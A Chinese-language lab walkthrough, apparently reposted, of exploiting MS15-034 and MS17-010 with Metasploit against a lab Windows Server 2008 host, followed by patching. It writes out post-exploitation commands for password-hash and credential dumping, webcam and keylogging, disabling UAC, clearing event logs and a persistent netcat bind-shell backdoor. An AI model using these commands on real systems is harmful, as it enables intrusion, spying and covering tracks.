网络安全: Kali Linux 使用 MSF 漏洞利用

目录

 一、实验

1.环境

2.POC验证与nmap扫描( ms15-034 )

3. Kali Linux 使用 MSF 漏洞利用( ms15-034 )

4.Windows server 安全加固

5.Windows server 安装补丁

6. Kali Linux 使用 MSF 漏洞验证 ( ms17-010)

7. Kali Linux 使用 MSF 漏洞利用( ms17-010 )

8. Kali Linux 进行 MSF 后渗透

9. Kali Linux 使用 持久性后门( nc)

二、问题

1.CMD防火墙如何配置

2.CMD注册表如何配置

3.CMD计划任务如何配置


 一、实验

1.环境

(1)主机

表1  主机

系统版本IP备注
Kali Linux2024.1

192.168.204.146(动态)

192.168.204.100(静态)

Windows server2008 R2192.168.204.150Kali(2024.1)的目标主机

(2)查看Kali Linux (2024.1)系统版本

cat /etc/os-release

(3)查看Kali Linux (2024.1)系统IP地址

ip addr

(4) 查看Windows server 2008 IP 地址

ipconfig

(5)openvas查看报告

点击CVEs查看通用漏洞编号(cve-2015-1635)

2.POC验证与nmap扫描( ms15-034 )

(1)执行验证脚本

VULN 存在漏洞

 python2 cve-2015-1635.poc

(2)进入MSF 控制台

msfconsole

(3)扫描网段

目标主机为192.168.204.150

db_nmap -sP 192.168.204.0/24

(4)扫描开放端口

db_nmap -sV 192.168.204.150

3. Kali Linux 使用 MSF 漏洞利用( ms15-034 )

(1) 搜索 ms15-034 脚本

search ms15-034

(2) 使⽤编号为 0 的脚本

use 0

(3) 设置⽬标主机

 set rhosts 192.168.204.150

查看Windows server状态

(4)运⾏脚本

run 

查看Windows server状态

4.Windows server 安全加固

(1)IIS管理器

(2)打开功能

(3)编辑功能设置

(4)关闭内核缓存

修改前:

修改后:

5.Windows server 安装补丁

(1)Windows 补丁查询

Microsoft Update Catalog

(2)搜索

KB3042553

(3)安装补丁

重启

 (4)Kali Lnux (2024.1) 使用MSF运⾏脚本

run 

(5)Windows server

保持正常

(6)POC验证

Patched 补丁已修复

 python2 cve-2015-1635.poc

6. Kali Linux 使用 MSF 漏洞验证 ( ms17-010)

(1) 进入MSF 控制台

msfconsole

(2) 搜索 ms17-010 脚本

search ms17-010

(2) 使⽤编号为 0 的脚本

use 3

(3) 设置⽬标主机

 set rhosts 192.168.204.150

查看Windows server状态

(4)运⾏脚本

run 

7. Kali Linux 使用 MSF 漏洞利用( ms17-010 )

(1) 使⽤编号为 0 的脚本

use 0

(3) 设置⽬标主机

 set rhosts 192.168.204.150

查看Windows server状态

(4)运⾏脚本

run 

8. Kali Linux 进行 MSF 后渗透

(1)获取windows 服务器的密⽂密码

Administrator第3个冒号后内容为密码

hashdump

(2) 解密

第一种方式:

https://cmd5.com/

 

第二种方式:

MSF加载kiwi模块

(3)使用kiwi模块获取明⽂密码

加载 kiwi 模块

load kiwi

检测所有凭证

creds_all

(4)屏幕截图

screenshot

(5)屏幕共享

screenshare

(6)监控摄像头

webcam_stream 

(7)进程迁移

获取用户身份和进程列表

getuidgetpid

查找 explorer 进程 (2704)

 ps -S explorer

迁移进程到 explorer

 migrate  2704

再次获取用户身份( 具有 administrator ⾝份)

getuid

进程列表已切换

getpid

(8)执⾏键盘操作记录

run post/windows/capture/keylog_recorder

Windows server 新建文本文件

查看键盘操作记录

vim /root/.msf4/loot/20240306131129_default_192.168.204.150_host.windows.key_889524.txt

结束 (CTRL + C)

(9)防⽕墙配置

进入 windows2008 的 cmd

消除乱码

chcp  65001

检查防火墙状态 (目前为关闭)

防火墙设置开启状态

netsh  advfirewall  set  allprofiles  state on

防火墙设置关闭状态

netsh  advfirewall  set  allprofiles  state off

防火墙添加指定端口并启用 (后门端口别名为backdoor)

netsh firewall add portopening tcp 444 backdoor enable all

查看

(10)UAC (用户账户控制设置)管理

查看

调整到最高

关闭

reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

开启

reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f

(11)清除日志

查看日志

应用程序日志

安全日志

安装日志

系统日志

退出 win2008 cmd

exit

清除日志

clearev

查看日志

9. Kali Linux 使用 持久性后门( nc)

(1)查看后门程序(nc.exe)

ls /usr/share/windows-binaries

(2)上传后⻔程序nc.exe 到Windows server

 upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32

查看

(3)查看任务计划

WIN + R 

taskschd.msc

查看

(4) 进入 cmd 命令⾏

cmd

(5)消除乱码

chcp 65001

(6)配置注册表开机⾃启

schtasks /create /tn "nc" /ru system /tr "c:\windows\system32\nc.exe -Ldp 444 -e cmd.exe" /sc onstart

查看

(7)重启

(8)查看进程

CTRL + SHIFT + ESC

(9)后门接入

 nc 192.168.204.150 444

退出

exit

二、问题

1.CMD防火墙如何配置

(1)配置

netsh:network shell ⽹络管理⼯具
advfirewall:advanced firewall ⾼级防火墙
set:设置
allprofiles:all 所有的profiles 配置
state:状态
off:关闭
on:开启

2.CMD注册表如何配置

(1)配置

ADD 添加⼀个注册表项
/v 创建键值  
/t 键值类型 
/d 键值的值                   1开/0关
/f  覆盖现有注册表项

3.CMD计划任务如何配置

(1)配置

schtasks:scheduled tasks 计划任务
/create:创建
/tn: task name 任务名称
/ru:run user 运⾏⽤户
system:系统⽤户
/tr:task run 任务执⾏的操作
-Ldp:Listen and port 监听端⼝
-e:execute 执⾏
/sc:schedule 计划任务表示计划任务触发的时机
onstart:开机

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/735336.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

代码随想录算法训练营第23天|669.修剪二叉搜索树、108.将有序数组转换为二叉搜索树、538.把二叉搜索树转换为累加树、总结篇

目录 一、力扣669.修剪二叉搜索树1.1 题目1.2 思路1.3 代码 二、力扣108.将有序数组转换为二叉搜索树2.1 题目2.2 思路2.3 代码2.4 总结 三、力扣538.把二叉搜索树转换为累加树3.1 题目3.2 思路3.3 代码3.4 总结 一、力扣669.修剪二叉搜索树 1.1 题目 1.2 思路 本题递归代码分…

day14_用户前台项目环境搭建(首页接口开发,分类接口开发,网关服务搭建,Redis缓存,Spring Cache)

文章目录 1 尚品甄选H5介绍1.1 业务功能介绍1.2 系统架构1.3 前端H5开发说明 2 搭建项目环境2.1 项目结构说明2.2 模块依赖说明2.3 环境说明2.4 项目模块创建2.4.1 spzx-parent2.4.2 spzx-service2.4.43 service-product 2.5 导入接口文档 3 首页接口开发3.1 需求分析3.3 接口开…

VScode格式化快捷键

vscode格式化代码快捷键 如何使用快捷键格式化代码。使用Java的格式去设置,发现不起作用。 在这里记录一下: 在Windows中,vscode格式化代码快捷键是“ShiftAltF”; 在Mac中,vscode格式化代码快捷键是“ShiftOption…

理解JavaScript中的WeakSet和WeakMap

🤍 前端开发工程师、技术日更博主、已过CET6 🍨 阿珊和她的猫_CSDN博客专家、23年度博客之星前端领域TOP1 🕠 牛客高级专题作者、打造专栏《前端面试必备》 、《2024面试高频手撕题》 🍚 蓝桥云课签约作者、上架课程《Vue.js 和 E…

RabbitMQ事务机制和确认机制

文章目录 生产者:RabbitMQ提供transaction和confirm模式来确保生产者不丢消息RabbitMQ 事务机制RabbitMQ确认机制 生产者:RabbitMQ提供transaction和confirm模式来确保生产者不丢消息 ● 通过事务实现 ● 通过发送方确认机制(publisher confirm)实现 1.…

N32L40x基于串口IAP实现(含升级工具)

bootloader实现要点 bootloader 设计要点 1.分配Flash空间,一部分用于bootloader 一部分用于 APP ,这里bootloader分配了7K空间,APP分配了121K空间 2.需要准备一个通讯接口,可以是串口,也可以时can等 3.准备mcu的内部flash驱动,可以实现连续读写的函数,flash擦除在写函…

数据结构-栈-表达式运算

文章目录 表达式运算实现:1.栈实现2.中缀表达式转后缀表达式计算 表达式运算实现: 1.栈实现 public class ExpressCalc {public static void main(String[] args) {/*使用栈实现一个0-9整数带括号的表达式计算处理步骤:1.创建两个栈&#x…

Yolov8-pose关键点检测:特征融合涨点篇 | 广义高效层聚合网络(GELAN) | YOLOv9

💡💡💡本文独家改进:即结合用梯度路径规划(CSPNet)和(ELAN)设计了一种广义的高效层聚合网络(GELAN),高效结合YOLOv8-pose,实现涨点。 将GELAN添加在backbone和head处,提供多个yaml改进方法 Yolov8-Pose关键点检测专栏介绍:https://blog.csdn.net/m0_6377421…

SSRF服务器请求伪造原理和pikachu靶场实验

★★免责声明★★ 文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 1、SSRF简介 SSRF全称:Server-Side Request…

java两个实体类相同属性的复制

1、操作对象工具 MyBeanUtils package com.nrxt.nms.mon.pt.cascade.utils;import org.apache.commons.lang.StringUtils; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.beans.BeanUtils; import org.springframework.beans.BeansEx…

017集——圆弧(ARC)转多段线(lwpolyline)——cad vba 中按一定精度拟合加点实现

在国土资源管理项目中,我们经常会遇到CAD转gis数据实现入库,而cad中的arc圆弧转为gis数据只能转出弧的顶点坐标,导致图形变形失真。若一个一个对弧进行手工增加点转为多段线,耗时耗力,效率极其低下。这里给出解决方案&…

C#(C Sharp)学习笔记_字符串的常用操作方法【十一】

文章目录 索引字符串( Index )遍历字符串( for )拆分字符串( Split )替代字符串( Replace )提取字符串( Substring )插入字符串( Insert )移除字符串( Remove ) 索引字符串( Index ) 当我们要查看字符串中的某个字符时,我们可以使用索引功能。 string ax "我…

继承杂谈。

内容一览 前言继承的概念及定义继承的意义继承关系及访问限定符父类和子类对象之间的转化继承后的作用域继承与有元继承与静态成员多继承继承和组合的区别:继承的总结和反思 前言 面向对象的三大特性:封装继承和多态,这三种特性优者很紧密地联…

【Prometheus】PromQL

数据类型 即时向量(instant vector) node_cpu_seconds_total{instance"ahoj-dev-ubuntu-virtualbox",mode"idle"} 区间向量(range vector) node_cpu_seconds_total{instance"ahoj-dev-ubuntu-virtu…

手拉手RocketMQ基础

消息中间件的对比 消息中间件 ActiveMQ RabbitMQ RocketMQ kafka 开发语言 java erlang java scala 单击吞吐量 万级 万级 10万级 10万级 时效性 ms us ms ms 可用性 高(主从架构) 高(主从架构) 非常高(主从架构) 非常高(主从架构) 消息中间件: activ…

MetaGPT部分源码解读

Action SerializationMixin: Pydantic在序列化一个对象时,会将其序列化为其最顶层父类的形式,而不是它实际子类的形式。这意味着,如果你有一个父类和一个继承自该父类的子类,当你将子类的实例序列化时,得到…

HTTP常见报错响应码

HTTP 响应状态代码指示特定 HTTP 请求是否已成功完成。响应分为五类: 信息响应成功响应重定向客户端错误服务器错误 1 、信息响应 100 Continue 这个临时响应表明,迄今为止的所有内容都是可行的,客户端应该继续请求,如果已经完 …

云上攻防-云产品篇堡垒机场景JumpServer绿盟SASTeleport麒麟齐治

知识点 1、云产品-堡垒机-产品介绍&攻击事件 2、云产品-堡垒机-安全漏洞&影响产品 章节点: 云场景攻防:公有云,私有云,混合云,虚拟化集群,云桌面等 云厂商攻防:阿里云,腾讯…

k8a 对外服务(ingress)详解(定义,暴露,代理,重写,)

目录 一、 对外服务 service策略的作用 外部访问方案 适用场景和限制 ingress如何实现对外服务 ingress 概念 定义 组成 工作原理 总结 二、 部署 nginx-ingress-controller 创建 ingress-controller pod及相关资源 创建目录: 下载配置文件 修改 集群…

CSS拖曳盒子案例

让我为大家带来一个小案例吧&#xff01; <!DOCTYPE html> <html><head><meta charset"utf-8"><title></title><style>* {margin: 0;padding: 0;}.box1 {width: 100px;height: 100px;background-color: black;margin-bot…